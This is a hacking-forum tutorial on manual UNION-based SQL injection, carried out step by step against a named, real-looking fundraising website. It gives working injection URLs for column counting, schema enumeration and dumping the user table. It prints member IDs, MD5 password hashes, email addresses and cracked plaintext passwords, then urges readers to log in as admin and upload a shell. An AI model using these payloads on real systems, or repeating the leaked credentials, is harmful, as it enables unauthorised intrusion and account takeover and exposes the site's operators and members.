[TUTORIAL] Manual SQL injection with example :)

[The High Roller]

 

Aslam 0 alaikum

What we are going to learn today is what we called UNION Based SQL injection

 

First you want to find the Valun site using sql dorks

like this

"inurl:index.php/id="

Step1: Finding the vulnerability in a website

many links likes that

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22

 

so you put string at the last (')

 

the link become

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22'

 

You get the error then the site is valun the link i provided is valun

 

Step2: Finding the number of columns a website has

now we need to find the number of columns by adding at the end of the link

order by x--  *where 'x' is random integer

so the link become like this

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 1--no error

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 2-- no error

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 8--no error

and so on

We increace the number untill we get the error

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 9--

 

Here we get the error so now we know that the number of columns are 8

 

Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement

 

If we perform the UNION SELECT statement, we can get both users and admin information from their database

The point is that, UNION SELECT returns our results with the information we need

If you want to find vulnerable columns, use UNION SELECT

If you want to find version of database, UNION SELECT

If you want admin information! use UNION SELECT

Alright, now that we know something about the Union function, lets continue.

 

Take our website that has 11 columns and add a "UNION SELECT" statement.

Here's how our query will look like.

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 UNION SELECT 1,2,3,4,5,6,7,8--

 

This is what you would normally do if you use UNION function while SQL injecting a website

 

Focus on something like this, "index.php?id=-X UNION SELECT N--"

Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,5,6,7,8--

 

Step4: Random numbers appear on screen, the next step

 

Here you'll find a bunch of numbers showing up on the screen.

These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.

 

In my given site you saw 5 and 7

You need to inject the number at the very top (always at the very top)

So, in this case we have number "5"

Now you might be asking, what can I do with a vulnerable column?

Well here's what you can get-- INFORMATION!

You need a lot of information to study from the website, here are a couple of examples.

 

Replace the vulnerable column i.e number 5 with a statement

 

group_concat(CHAR(32,58,32),user(),database(),version())

 

user() = find the user information

version() = find the version of the database

database() = find the current database

 

link becomes like

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

 

tfnprimary2012@184.168.27.57 : tfnprimary2012 : 5.0.96-log

user()=tfnprimary2012@184.168.27.57

database()=tfnprimary2012

version()=5.0.96-log

 

So the database version is 5, which is good because it'll be easier to SQL inject the website.

Note:

Database version less than 5 "<5" = you need to guess tables (a bit hard work)

Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

 

If you ever want to SQLi a website with version <5, then you can guess the tables with the following below

user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin

 

We have almost every information we have about the website

Look close here, we used a command "group_concat"

Here's its function:

Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())

Note:Group_concat won't work with versions less than 5

 

Step5:Getting the table names

 

Alright, first lets look up some functions we're gonna use to extract table names (Important)

group_concat = grouping up data to a specific statement

table_name = tables names to be shown on screen

from = location of a specified statement

information_schema.tables = information in the database with table names in it

table_schema = tables in a database

database() = current database in the website

0x0a = a Hex code that creates a new line for organizing tables in an order

Now lets combine those functions and make up a query that will give us the table names

So, here's what our link will look like:

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--

 

In here, we replaced our vulnerable column with "group_concat(table_name)"

and then we added a

"from information_schema.tables where table_schema=database()--"

after the last column (excluding the two hyphens after 11)

Results on table names:

 

content_art_articles,content_art_authors,content_art_categories,content_art_listings_spon,content_art_rotations,core_categories,core_listings_free,core_listings_spon,membership_grouppermissions,membership_groups,membership_userpermissions,membership_userrecords,membership_users,salesleads,salesleads_comm,salesleads_infotypes,salesleads_list

 

Alright now that we've found the tables, what you're gonna have to do is

that, you have to find tables where user/admin information are stored

In this case, "membership_users" seems to be having an admin information stored in it.

It's all about predicting and expecting what's behind every table you see

Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.

Replace and Add the following

Vulnerable Column = replace

"(table_name)" with "(column_name)"

&

"from information_schema.tables where table_schema=database()--" with

"from information_schema.columns where table_name=membership_users--"

 

If nothing happens then convert the 'membership_users' to HEX

using

http://www.swingnote.com/tools/texttohex.php

 

membership_users=6d656d626572736869705f7573657273

 

rember to add 0x before 6d656d626572736869705f7573657273

 

so the link become

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x6d656d626572736869705f7573657273--

 

the data form tables are as

 

memberID,passMD5,email,signupDate,groupID,isBanned,isApproved,custom1,custom2,custom3,custom4,comments

 

we need only

memberID,passMD5,email

 

Step6:Getting Data from Columns

 

Alright, lets extract the information

Look closely at the syntax:

 

http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(memberID,0x3a,passMD5,0x3a,email,0x3a),6,7,8 from membership_users--

 

Keep this formula-like syntax in your mind whenever you want to extract data from columns

http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--

 

Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )

 

column names = (memberID,passMD5,email)

separator = 0x3a (a hex for a colon " : ")

table name = membership_users

Once you execute that syntax, you get the username and password separated by a colon

 

Results after executing the syntax:

 

 

spradmin:48162419062b67c10a27752e4706d933:support@fundraisingnetwork.org

mp8s4hz5:48162419062b67c10a27752e4706d933:support@fundraisingnetwork.org

43449928:16c03ee03a4a7060c40e98dad78b34a2:jolian@justfundraising.com

783185498:1901151906d22575c80feda185f6c537:service@easyfundraisingcards.com

admin:48162419062b67c10a27752e4706d933:support

 

Bingo we got the admin login details

 

now crack the MD5 hash by

http://www.md5decrypter.co.uk/

we found that

48162419062b67c10a27752e4706d933 MD5: xZver5n3

48162419062b67c10a27752e4706d933 MD5: xZver5n3

48162419062b67c10a27752e4706d933 MD5: xZver5n3

16c03ee03a4a7060c40e98dad78b34a2 MD5: justfund

1901151906d22575c80feda185f6c537 MD5: nw8YcxP

 

 

Now find the admin login and upload the shell and Bingo :)

 

Any qustions relating to this tut feel free to ask

 

Regards :

The High Roller